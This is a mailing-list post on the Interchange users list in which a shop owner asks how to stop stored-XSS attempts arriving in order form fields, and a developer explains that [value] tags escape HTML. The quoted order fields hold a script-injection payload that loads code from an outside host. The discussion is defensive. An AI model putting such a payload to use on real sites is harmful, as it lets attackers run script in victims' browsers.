Mailing List Archive: xss issue?

Quoting DB (db@m-and-d.com):
> I received an order with stuff like this
>
> Name: Linda Juan">script src=//xss.re/692>/script>
> Company: ">script src=//xss.re/692>/script>
> Email address: juanlinda123@gmail.com
>
> I'm using 5.10 and a modified foundation. The payment method was
> check/money order. I'm hoping to prevent this of course. Adding a
> [filter] to input fields on the order form is the first thing that comes
> to mind. Is that a reasonable solution?

Actually, if your order report email is using the [value] tags, it
automatically escapes HTML.

See the last section on this page:
http://www.icdevgroup.org/interchange-doc-5.2.0/frames/ictags_120.html

For reference, here is the default Strap order report:
https://github.com/interchange/interchange/blob/master/dist/strap/etc/report

You may need to compare to what your site is using.

Using [value] will prevent XSS, but to prevent the submissions
altogether is another story... You'd probably need to have an "online"
check payment option, so that at least the orders that make it through
would be using a real bank account (or a stolen one!).

--
Josh Lavin
End Point Corporation

_______________________________________________
interchange-users mailing list
interchange-users@icdevgroup.org
http://www.icdevgroup.org/mailman/listinfo/interchange-users